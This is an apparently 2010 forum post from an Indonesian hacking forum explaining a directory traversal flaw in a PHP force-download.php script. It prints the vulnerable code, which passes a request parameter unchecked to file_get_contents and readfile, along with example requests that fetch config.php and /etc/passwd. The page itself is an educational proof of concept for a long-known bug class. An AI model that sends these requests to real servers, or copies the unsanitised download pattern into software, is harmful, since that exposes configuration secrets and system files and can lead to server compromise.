-== D E S C R I P T I O N ==-
Directory Traversal is a vulnerability which allows attackers to access restricted directories
and execute commands outside of the web server's root directory. This vulnerability is like Local File
Inclussion and we can found it on Remote File Disclosure tecnique
(affects /force-download.php)
------------------------------------------------------------->>
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access
files in other directories.As a result, attackers might view restricted files or execute commands,
leading to a full compromise of the Web server.
-== P r o o f O f C o n c e p t ==-
As we knows, Remote File Disclosure has vulnerability on force-download.php
--------------------------------------------
<?php
header("Content-type: application/force-download");
header("Content-disposition: attachment; filename=".$_GET['gabriel']);
echo file_get_contents($_GET['gabriel']);
?>
--------------------------------------------
and be able to >>
Request: http://127.0.0.1/force-download.php?gabriel=[files]
http://127.0.0.1/force-download.php?gabriel=index.php
http://127.0.0.1/force-download.php?gabriel=config.php
--------------------------------------------
<?php $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['gabriel'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
exit(0);
?>
--------------------------------------------
Request: http://127.0.0.1/force-download.php?gab ... etc/passwd
--------------------------------------------
w00ps!! we can succesfully read the "etc/passwd" file. See the source code on
$_REQUEST['gabriel']; and @readfile($file); for that's command, we can see
the content of an arbitrary file ^_^ (such as on Local File Inclussion vulnerability).
http://www.exploit-db.com/papers/12589 :circle:
Directory traversal (Unix) Vulnerability
Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
-
Neo-Gabriel
- Posts: 4
- Joined: Fri Aug 07, 2009 4:33 pm
Directory traversal (Unix) Vulnerability
Post by Neo-Gabriel » Thu May 20, 2010 4:58 pm
In the name of Allah. the most gracious, the most merciful..
http://neo-gabriel.uni.cc/v1/ ~ gabriel site's
http://neo-gabriel.uni.cc/v1/ ~ gabriel site's
Jump to
- Yogya Family Code
- ↳ Forum Perkenalan
- ↳ Berita dan Informasi Terbaru
- ↳ X-Code koleksi
- ↳ CD Yogyafree Support
- ↳ Peraturan Forum
- Interaksi Forum Pilihan
- ↳ Forum Membahas Semua Jenis Hacking
- ↳ Newbie's Corner
- ↳ Web Hacking
- ↳ Tools For Hacking - Security & Computer Forensic
- ↳ Network & Wireless Hacking
- ↳ Google Hacking
- ↳ 1337 Zone
- ↳ Hacking Umum
- ↳ Diskusi Kali-linux
- ↳ Pengembangan Exploit
- ↳ Forum Membahas Semua Jenis Programming
- ↳ Logika , Algoritma dan pemrograman terstruktur
- ↳ C++ & Visual C
- ↳ Visual Basic
- ↳ Java
- ↳ Delphi - Pascal
- ↳ Perl
- ↳ Ruby & Python
- ↳ Assembly - Reverse Engineering
- ↳ Pemrograman Lainnya
- ↳ Exploits | vulnerability | 0day Archives
- ↳ remote exploits
- ↳ local expoits
- ↳ website application exploits
- ↳ miscellaneous POC-DOS-Crash-Buffer Overflow Exploits
- ↳ Operating System - Software & Support
- ↳ GNU/Linux & Opensource
- ↳ XCode Linux
- ↳ Linux Umum
- ↳ Windows & Warez
- ↳ Mac OS
- ↳ Cisco
- ↳ Mikrotik
- ↳ Oracle Solaris
- ↳ BSD
- ↳ Lainnya
- ↳ Forum membahas Web Development
- ↳ PHP
- ↳ C# & VB.NET
- ↳ Website Templates ( CMS, CSS,HTML,PSD,FLA, etc)
- ↳ Ajax
- ↳ Forum membahas malware (Virus, Spyware, Hijack, dll)
- ↳ Forum Jaringan Komputer / Computer Networking
- ↳ Forum Phreaking - Ponsel - Software
- ↳ Phreaking, Hacking, Pembahasan Ponsel
- ↳ Symbian OS - Software
- ↳ Windows Mobile - Software
- ↳ Google Android - Software
- ↳ Aplikasi - Software pendukung Ponsel - PDA lainnya
- ↳ Forum Filsafat Ilmu Komputer
- Interaksi Komputer Umum
- ↳ Forum Membahas Semua Jenis Perbaikan Komputer
- ↳ Forum Graphics & Animation
- ↳ Ebook - Berita & Artikel teknologi informasi
- ↳ Forum Link-Link Serbaguna
- ↳ Forum membahas semua hal tentang warnet / ISP
- YogyaFree Supports Community
- ↳ Komunitas Pendukung YogyaFree
- ↳ Jawa
- ↳ YogyaFree Bandung
- ↳ Yogyafree Bogor
- ↳ Yogyafree Jakarta
- ↳ Yogyafree Malang
- ↳ Yogyafree Probolinggo
- ↳ Yogyafree Semarang
- ↳ Yogyafree Solo
- ↳ Yogyafree Surabaya
- ↳ Yogyafree Tegal
- ↳ Yogyafree Yogyakarta
- ↳ Yogyafree Sidoarjo
- ↳ Sumatera
- ↳ Yogyafree Aceh
- ↳ Yogyafree Bengkulu
- ↳ Yogyafree Lampung
- ↳ Yogyafree Medan
- ↳ Yogyafree Palembang
- ↳ Yogyafree Padang
- ↳ Yogyafree Pekanbaru
- ↳ Kalimantan
- ↳ Yogyafree Pontianak
- ↳ Yogyafree Samarinda & Balikpapan
- ↳ Yogyafree Banjarmasin
- ↳ Sulawesi
- ↳ Yogyafree Makasar
- ↳ Yogyafree Manado
- ↳ Papua
- ↳ Yogyafree Papua
- ↳ Yogyafree Bali
- ↳ Maluku
- ↳ Yogyafree Ambon
- ↳ Yogyafree Ternate - Tidore
- Lainnya
- ↳ Forum Jual Beli
- ↳ Kontes
- ↳ XCode Web Patching Contest
- ↳ XCode Blog Contest
- ↳ Ngobrol Bebas Asal Sopan
- ↳ Polling, Pendapat, Kritik dan Saran
- ↳ Lowongan Pekerjaan
- ↳ Promosi Website, Homepage, Blog dan lainnya
